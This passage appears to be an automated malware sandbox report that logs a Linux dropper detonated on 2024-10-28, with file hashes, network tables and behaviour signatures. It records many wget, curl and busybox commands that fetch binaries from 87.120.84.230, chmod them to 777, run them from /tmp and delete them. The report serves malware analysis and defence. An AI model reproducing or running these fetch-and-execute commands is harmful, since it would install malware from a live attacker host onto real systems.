/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 03:22
Reported
2024-10-28 03:25
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
22s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
